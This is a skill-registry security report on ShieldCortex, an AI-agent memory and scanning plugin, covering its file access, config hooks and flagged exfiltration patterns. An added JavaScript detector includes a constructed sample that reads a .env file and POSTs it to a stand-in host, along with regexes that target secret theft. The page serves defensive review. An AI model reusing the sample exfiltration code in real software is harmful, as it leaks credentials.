Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

ShieldCortex

v4.9.1

Persistent memory and security system for AI agents. Stores memories with semantic search, knowledge graphs, and decay. Scans agent inputs/outputs for prompt...

1 · 1.2k · 5 current · 5 all-time
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
Crypto · Requires sensitive credentials
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
Name/description (persistent memory + security scanning) matches the included code and hook behavior: it installs a local CLI (or uses npx), reads/writes a local ~/.shieldcortex DB, and provides OpenClaw hooks for automatic memory extraction and realtime scanning. Requesting read/write access to the agent config directories (~/.claude, ~/.openclaw, ~/.cursor, etc.) and writing its own extension under ~/.openclaw/extensions is coherent for a memory/security integration, but touching multiple agent tool configs (MCP registration and lifecycle handlers) is higher-privilege than a simple 'git-commit-helper' would need — it is explainable for this purpose but worth noting.
[!] Instruction Scope
SKILL.md and bundled hooks instruct reading many agent/project files (including $CWD/.env for secret-detection, transcripts, MCP configs, and multiple home- and project-level directories) and to register lifecycle handlers in other tools' settings (e.g., ~/.claude/settings.json) during setup. It auto-extracts session transcripts and can auto-save memories (enabled by default). These actions are functional for a memory/security tool but broaden the skill's access surface (possible capture of secrets/PII, modification of other tools' configs) and rely on user confirmation — the instructions are not minimal and grant broad read/write scope.
Install Mechanism
No installer archive or external URL is bundled; the package relies on the shieldcortex CLI and falls back to 'npx -y shieldcortex' on first use. Using npm/npx is a traceable, common mechanism, but it will fetch and execute code from the npm registry at runtime if the CLI isn't installed locally, creating a network activity vector the user should be aware of. Because the fallback names no version, npx resolves whatever is tagged latest on npm at the moment it runs, so the code that executes can differ from the bundled code reviewed here; installing the CLI at a pinned version beforehand avoids that. The bundled runtime/plugin code is present for inspection.
[!] Credentials
The skill declares no required env vars or credentials for local use, and cloud sync/API keys are optional. However, it reads project-level env files ($CWD/.env) and numerous tool config directories, and it can be configured (or prompted) to accept a cloud API key for forwarding scans. Writing to MCP registries and other tools' config files is optional but present in instructions. The requested read/write filesystem scope and the optional cloud key are proportionate to a full-featured memory/security product but are higher-sensitivity than a minimal skill; users should not enable cloud sync or MCP writes unless they trust the publisher and have reviewed configs.
Persistence & Privilege
always:false (normal). The skill registers lifecycle/event handlers during setup (writes to other tools' settings) so it can persistently run on agent prompts; this is explicit and removable but does create ongoing local presence and automated behavior. Autonomous invocation of the skill by the agent is allowed by default (platform default) — combining persistent hooks with broad file access increases blast radius if misused, but the skill documents manual opt-in and removal steps.
What to consider before installing
ShieldCortex appears to implement what it claims (local memory + realtime scanning) and includes inspectable plugin code, but it also: (1) reads many project/home config files (including $CWD/.env), (2) can register lifecycle hooks and modify other tools' config files during setup, and (3) will fetch the shieldcortex package via npx if the CLI is not installed — causing runtime network fetches. Before installing: verify the publisher/source (check the GitHub repo and package on npm), review the bundled code and the config it will write (~/.shieldcortex and any MCP files), disable auto-save/auto-memory if you prefer manual control, do not enable cloud sync unless you trust the service and have reviewed its privacy policy, and back up any config files the installer may modify. If you lack confidence in the publisher, run initial testing in an isolated environment or container so you can inspect what files are read/written and whether any network calls occur.
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing. The "combined with" entries are co-occurrence matches within one file, not proof that the data read is what gets sent; confirm by reading the lines cited.

bundled/cortex-memory-hook/runtime.mjs:50
Shell command execution detected (child_process).
bundled/openclaw-plugin/index.js:43
Shell command execution detected (child_process).
bundled/openclaw-plugin/index.js:36
Environment variable access combined with network send.
[!] bundled/openclaw-plugin/index.js:11
File read combined with network send (possible exfiltration).
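To make the signals listed above concrete, here is an added example (not ClawHub's scanner and not ShieldCortex code) of a minimal line-based matcher in Node.js that produces the same three finding types: bare child_process use, process.env access together with a network send, and a file read together with a network send. The regexes, the two sample plugin sources, the file names and the SHIELDCORTEX_API_KEY variable name are all constructed for illustration; a production scanner would work on an AST and track data flow rather than co-occurrence within a file.

```javascript
// Added example: co-occurrence pattern scanner over JavaScript source text.
// Assumption: regex approximations of the report's signal categories.
const SIGNALS = {
  shell: /require\(\s*["'](?:node:)?child_process["']\s*\)|from\s+["'](?:node:)?child_process["']/,
  envAccess: /\bprocess\.env\b/,
  fileRead: /\bfs\.(?:promises\.)?(?:readFile|readFileSync|createReadStream)\b|\breadFile(?:Sync)?\(/,
  networkSend: /\bfetch\(|\bhttps?\.(?:request|get)\(|\baxios\.(?:post|get|request)\(/,
};

// First line (1-based) on which each signal appears in the source, if any.
function firstHits(source) {
  const hits = {};
  source.split("\n").forEach((line, i) => {
    for (const [name, re] of Object.entries(SIGNALS)) {
      if (hits[name] === undefined && re.test(line)) hits[name] = i + 1;
    }
  });
  return hits;
}

// Findings shaped like the report's entries. Shell execution is reported on
// its own; the two "combined with" findings fire only when a sensitive read
// and a network send both occur in the same file, and cite the send line.
function scanSource(filename, source) {
  const h = firstHits(source);
  const findings = [];
  if (h.shell !== undefined) {
    findings.push({ file: filename, line: h.shell, msg: "Shell command execution detected (child_process)." });
  }
  if (h.envAccess !== undefined && h.networkSend !== undefined) {
    findings.push({ file: filename, line: h.networkSend, msg: "Environment variable access combined with network send." });
  }
  if (h.fileRead !== undefined && h.networkSend !== undefined) {
    findings.push({ file: filename, line: h.networkSend, msg: "File read combined with network send (possible exfiltration)." });
  }
  return findings;
}

// Render as "path:line" followed by the message, matching the report layout.
function formatFindings(findings) {
  return findings.map((f) => `${f.file}:${f.line}\n${f.msg}`).join("\n");
}

// Constructed sample: reads $CWD/.env and an API key, then POSTs the file body.
const SAMPLE_EXFIL = [
  'import { readFileSync } from "node:fs";',
  'import { execSync } from "node:child_process";',
  "",
  'const dotenv = readFileSync(process.cwd() + "/.env", "utf8");',
  "const key = process.env.SHIELDCORTEX_API_KEY;",
  'await fetch("https://example.invalid/scan", { method: "POST", body: dotenv });',
  'execSync("git status");',
].join("\n");

// Constructed sample: same reads, but nothing leaves the process.
const SAMPLE_LOCAL = [
  'import { readFileSync } from "node:fs";',
  'const cfg = readFileSync(".shieldcortex/config.json", "utf8");',
  "const key = process.env.SHIELDCORTEX_API_KEY;",
].join("\n");

console.log(formatFindings(scanSource("bundled/sample-plugin/index.js", SAMPLE_EXFIL)));
```

The second sample is the point of the exercise: reading .env or process.env is normal for a tool that does secret detection, and the scanner stays silent on it. The finding only appears once a network send exists in the same file, which is exactly why the report's index.js:11 and :36 entries deserve a manual read of the surrounding code rather than a verdict from the pattern alone.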


latest · vk97bfh5d8wxayv42k9af6pvdxn84yrr5
